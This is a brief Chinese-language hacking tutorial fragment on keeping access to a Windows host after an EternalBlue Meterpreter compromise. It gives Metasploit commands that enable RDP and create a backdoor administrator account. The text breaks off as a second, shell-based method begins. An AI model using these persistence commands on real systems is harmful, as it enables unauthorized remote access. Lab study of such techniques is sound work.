我们知道当我们拿到主机meterpreter权限是可以留后门进行持久化攻击,常见的cmd命令
创建文本,并向里出入内容,并打开:
echo "hello I am hacker" >>1.txt
之后再打开:notepad 1.txt即可
拿永恒之蓝来说得到meterpreter后想要利用3389进行远程登录就得需要用户账号密码,一下有两种方法创建账号
方法一:利用msf的post后渗透攻击模块直接在 直接在meterpreter下创建,这种创建的账号直接就是administrators权限
meterpreter > run post/windows/manage/enable_rdp
meterpreter > run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456
方法二:通过shell进入靶机,在靶机里创建账号
meterpreter >